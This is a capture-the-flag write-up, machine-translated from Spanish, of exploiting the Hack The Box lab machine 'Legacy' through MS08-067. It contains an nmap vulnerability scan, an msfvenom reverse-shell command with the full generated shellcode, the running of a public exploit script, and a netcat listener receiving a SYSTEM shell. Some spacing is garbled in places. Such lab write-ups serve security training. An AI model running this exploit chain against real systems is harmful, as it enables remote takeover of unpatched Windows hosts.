This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.
Description
In this post, we exploit the Legacy machine using CVE-2008-4250. It resembles the previous machine, Blue, but also covers concepts such as generating shellcode with Msfvenom while avoiding zzz_exploit.py.
❯ nmap --script vuln -p 135,139,44510.10.10.4 -oN Vulnschecker StartingNmap7.92 ( https://nmap.org ) at 2022-08-11 05:05 CEST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 10.10.10.4 Host is up (0.044s latency). PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds
Host script results: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143https://www.hackthebox.com/storage/avatars/60dc190c4c015cfe3a3aef9b5afca254.png | Riskfactor:HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosuredate:2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ |_smb-vuln-ms10-054: false | smb-vuln-ms08-067: | VULNERABLE: | MicrosoftWindows system vulnerable to remote code execution (MS08-067) | State: LIKELY VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | VistaGoldandSP1, Server2008, and7Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
The target is vulnerable and we have two options: smb-vuln-ms17-010 & smb-vuln-ms08-067. We choose the latter because we used the first one on Blue.
Exploitation with EternalBlue
Repository
This GitHub repository provides a Python script for exploiting CVE-2008-4250.
❯ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.5LPORT=1234EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows Found11 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai failed with A valid opcode permutation could not be found. Attempting to encode payload with 1 iterations of generic/none generic/none failed with Encoding failed due to a bad character (index=3, char=0x00) Attempting to encode payload with 1 iterations of x86/call4_dword_xor x86/call4_dword_xor succeeded with size 348 (iteration=0) x86/call4_dword_xor chosen with final size 348 Payloadsize:348 bytes Final size of c file:1488 bytes unsigned char buf[] = "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" "\x6f\x88\xb5\xee\x83\xee\xfc\xe2\xf4\x93\x60\x37\xee\x6f\x88" "\xd5\x67\x8a\xb9\x75\x8a\xe4\xd8\x85\x65\x3d\x84\x3e\xbc\x7b" "\x03\xc7\xc6\x60\x3f\xff\xc8\x5e\x77\x19\xd2\x0e\xf4\xb7\xc2" "\x4f\x49\x7a\xe3\x6e\x4f\x57\x1c\x3d\xdf\x3e\xbc\x7f\x03\xff" "\xd2\xe4\xc4\xa4\x96\x8c\xc0\xb4\x3f\x3e\x03\xec\xce\x6e\x5b" "\x3e\xa7\x77\x6b\x8f\xa7\xe4\xbc\x3e\xef\xb9\xb9\x4a\x42\xae" "\x47\xb8\xef\xa8\xb0\x55\x9b\x99\x8b\xc8\x16\x54\xf5\x91\x9b" "\x8b\xd0\x3e\xb6\x4b\x89\x66\x88\xe4\x84\xfe\x65\x37\x94\xb4" "\x3d\xe4\x8c\x3e\xef\xbf\x01\xf1\xca\x4b\xd3\xee\x8f\x36\xd2" "\xe4\x11\x8f\xd7\xea\xb4\xe4\x9a\x5e\x63\x32\xe0\x86\xdc\x6f" "\x88\xdd\x99\x1c\xba\xea\xba\x07\xc4\xc2\xc8\x68\x77\x60\x56" "\xff\x89\xb5\xee\x46\x4c\xe1\xbe\x07\xa1\x35\x85\x6f\x77\x60" "\xbe\x3f\xd8\xe5\xae\x3f\xc8\xe5\x86\x85\x87\x6a\x0e\x90\x5d" "\x22\x84\x6a\xe0\xbf\xe4\x7f\x8d\xdd\xec\x6f\x8c\x67\x67\x89" "\xe2\xa5\xb8\x38\xe0\x2c\x4b\x1b\xe9\x4a\x3b\xea\x48\xc1\xe2" "\x90\xc6\xbd\x9b\x83\xe0\x45\x5b\xcd\xde\x4a\x3b\x07\xeb\xd8" "\x8a\x6f\x01\x56\xb9\x38\xdf\x84\x18\x05\x9a\xec\xb8\x8d\x75" "\xd3\x29\x2b\xac\x89\xef\x6e\x05\xf1\xca\x7f\x4e\xb5\xaa\x3b" "\xd8\xe3\xb8\x39\xce\xe3\xa0\x39\xde\xe6\xb8\x07\xf1\x79\xd1" "\xe9\x77\x60\x67\x8f\xc6\xe3\xa8\x90\xb8\xdd\xe6\xe8\x95\xd5" "\x11\xba\x33\x55\xf3\x45\x82\xdd\x48\xfa\x35\x28\x11\xba\xb4" "\xb3\x92\x65\x08\x4e\x0e\x1a\x8d\x0e\xa9\x7c\xfa\xda\x84\x6f" "\xdb\x4a\x3b"
Modifying the Script
Before using the exploit, we add our shellcode to ms08_067_2018.py to define the reverse shell.
❯ python ms08_067_2018.py ####################################################################### # Ms08-067 Exploit # This Is A Modified Verion Of Debasis Mohanty'S Code (Https://Www.Exploit-Db.Com/Exploits/7132/). # The Return Addresses And The Rop Parts Are Ported From Metasploit Module Exploit/Windows/Smb/Ms08_067_netapi # # Mod In 2018 By Andy Acer: # - Added Support For Selecting A Target Port At The Command Line. # It Seemed That Only 445 Was Previously Supported. # - Changed Library Calls To Correctly Establish A Netbios Session For Smb Transport # - Changed Shellcode Handling To Allow For Variable Length Shellcode. Just Cut And Paste # Into This Source File. #######################################################################
Example: MS08_067_2018.py 192.168.1.11445 -- for Windows XP SP0/SP1 Universal, port 445 Example: MS08_067_2018.py 192.168.1.12139 -- for Windows 2000 Universal, port 139 (445 could also be used) Example: MS08_067_2018.py 192.168.1.13445 -- for Windows 2003 SP0 Universal Example: MS08_067_2018.py 192.168.1.14445 -- for Windows 2003 SP1 English Example: MS08_067_2018.py 192.168.1.15445 -- for Windows XP SP3 French (NX) Example: MS08_067_2018.py 192.168.1.16445 -- for Windows XP SP3 English (NX) Example: MS08_067_2018.py 192.168.1.17445 -- for Windows XP SP3 English (AlwaysOn NX)
3- Run the script with the required parameters, in this case os=6 and port=445.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
❯ python2 ms08_067_2018.py 10.10.10.46445 ####################################################################### # Ms08-067 Exploit # This Is A Modified Verion Of Debasis Mohanty'S Code (Https://Www.Exploit-Db.Com/Exploits/7132/). # The Return Addresses And The Rop Parts Are Ported From Metasploit Module Exploit/Windows/Smb/Ms08_067_netapi # # Mod In 2018 By Andy Acer: # - Added Support For Selecting A Target Port At The Command Line. # It Seemed That Only 445 Was Previously Supported. # - Changed Library Calls To Correctly Establish A Netbios Session For Smb Transport # - Changed Shellcode Handling To Allow For Variable Length Shellcode. Just Cut And Paste # Into This Source File. #######################################################################
WindowsXPSP3English (NX)
[-]Initiating connection [-]connected to ncacn_np:10.10.10.4[\pipe\browser] Exploit finish
4- Confirm that the reverse shell connected successfully.
1 2 3 4 5 6 7
❯ rlwrap nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.16.5] from (UNKNOWN) [10.10.10.4] 1032 MicrosoftWindowsXP [Version5.1.2600] (C) Copyright1985-2001MicrosoftCorp.
C:\WINDOWS\system32>
5- We are nt authority\system! Perfect, we can now retrieve the flags.
Flags
User.Txt
1 2 3 4 5 6 7 8 9 10
Directory of C:\Documents and Settings\john\Desktop